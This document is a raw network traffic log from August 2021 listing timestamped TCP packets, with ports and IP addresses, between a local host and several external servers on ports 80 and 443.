Aug 23, 2021 02:08:57.971703053 CEST	80	49752	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:57.978713989 CEST	80	49752	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:57.978811026 CEST	49752	80	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:57.986955881 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:57.987699032 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.987723112 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.987734079 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.988862038 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.988884926 CEST	80	49751	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:57.988951921 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.989101887 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.989119053 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.989125013 CEST	49751	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:57.991878033 CEST	49748	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:57.994729042 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.003180027 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.003340960 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.043601990 CEST	49750	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:58.044826984 CEST	49755	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:58.048257113 CEST	80	49748	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.048362017 CEST	49748	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.051306009 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.051402092 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.059199095 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.066945076 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.067100048 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.067326069 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.067734003 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.069022894 CEST	80	49750	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:58.069113016 CEST	49750	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:58.069977999 CEST	80	49755	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:58.070066929 CEST	49755	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:58.070488930 CEST	49755	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:58.083256006 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.084259987 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.084319115 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.084371090 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.084408045 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.095643997 CEST	80	49755	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:58.096401930 CEST	80	49755	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:58.096430063 CEST	80	49755	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:58.096518040 CEST	49755	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:58.096951008 CEST	49755	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:58.111557007 CEST	80	49749	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:58.115477085 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.123542070 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.123590946 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.123713017 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.123748064 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.123750925 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.123806953 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.123827934 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.124031067 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.124113083 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.124206066 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.124305964 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.124507904 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.124584913 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.124722004 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.124752998 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.124845028 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.124912024 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.124989986 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.152230024 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.168409109 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.168477058 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.168540955 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.179832935 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.179871082 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.179903984 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.179940939 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.179972887 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.180099010 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.180211067 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.180242062 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.180320024 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.180540085 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.180702925 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.180798054 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.180867910 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.180958033 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.180984020 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.181022882 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.191823959 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.207963943 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.214124918 CEST	49755	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:58.215306044 CEST	49756	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:58.222387075 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.222455978 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.222489119 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.222526073 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.222531080 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.222573042 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.222606897 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.222630978 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.222649097 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.222682953 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.222687006 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.222728014 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.222747087 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.222775936 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.222784042 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.222832918 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.222840071 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.222892046 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.222894907 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.222949028 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.222953081 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.223001957 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.223005056 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.223050117 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.223499060 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.223563910 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.223597050 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.223615885 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.223622084 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.223680019 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.223735094 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.223746061 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.223761082 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.223807096 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.224585056 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.224642992 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.224663019 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.224718094 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.224745035 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.224814892 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.224889994 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.224936962 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.224987030 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.225027084 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.225347042 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.225395918 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.225418091 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.225438118 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.225459099 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.225475073 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.225488901 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.225512981 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.225526094 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.225563049 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.226319075 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.226358891 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.226396084 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.226433992 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.226453066 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.226464033 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.226475954 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.226504087 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.226538897 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.227555990 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.227623940 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.236143112 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.236166954 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.236289024 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.236371994 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.236488104 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.236568928 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.236732006 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.236788034 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.236825943 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.236872911 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.236912012 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.236932993 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.237102032 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.237118006 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.237164021 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.237176895 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.237198114 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:58.237345934 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:58.239053011 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.239099979 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.239135981 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.239160061 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.239190102 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.239187956 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.239212990 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.239213943 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.239217997 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.239223003 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.239227057 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.239237070 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.239250898 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.239310026 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.239320993 CEST	80	49755	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:58.239372969 CEST	49755	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:58.240154028 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.240181923 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.240204096 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.240216970 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.240227938 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.240232944 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.240252972 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.240256071 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.240281105 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.240292072 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.240466118 CEST	80	49756	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:58.240544081 CEST	49756	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:58.240982056 CEST	49756	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:58.241031885 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.241058111 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.241080999 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.241095066 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.241102934 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.241121054 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.241125107 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.241157055 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.241164923 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.241168976 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.242034912 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.242065907 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.242089033 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.242110968 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.242125034 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.242134094 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.242146015 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.242192030 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.243287086 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.243313074 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.243377924 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.243397951 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.243561029 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.243598938 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.243622065 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.243662119 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.243693113 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.243695974 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.244056940 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.244083881 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.244107962 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.244111061 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.244126081 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.244129896 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.244153023 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.244226933 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.244256020 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.244261980 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.244841099 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.244867086 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.244891882 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.244900942 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.244915962 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.244915962 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.244940042 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.244959116 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.244997978 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.245027065 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.245768070 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.245851040 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.245862961 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.245908976 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.245934010 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.245960951 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.245975018 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.245985031 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.246011019 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.246021986 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.246758938 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.246784925 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.246807098 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.246812105 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.246824980 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.246829987 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.246840954 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.246853113 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.246887922 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.246902943 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.247724056 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.247750998 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.247775078 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.247792959 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.247797012 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.247821093 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.247843027 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.247978926 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.248621941 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.248648882 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.248672962 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.248683929 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.248696089 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.248696089 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.248714924 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.248718977 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.248739004 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.248758078 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.249597073 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.249622107 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.249644995 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.249650955 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.249667883 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.249669075 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.249691963 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.249708891 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.249737978 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.249761105 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.256083012 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.256114960 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.256139040 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.256160975 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.256190062 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.256182909 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.256203890 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.256217003 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.256222010 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.256242037 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.256254911 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.256264925 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.256273985 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.256290913 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.256299973 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.256314993 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.256354094 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.256364107 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.256376982 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.256400108 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.256403923 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.256422997 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.256432056 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.256445885 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.256481886 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.257121086 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.257184982 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.257191896 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.257215023 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.257256031 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.257263899 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.257287025 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.257312059 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.257333994 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.257414103 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.258120060 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.258156061 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.258178949 CEST	443	49753	162.159.134.233	192.168.2.3
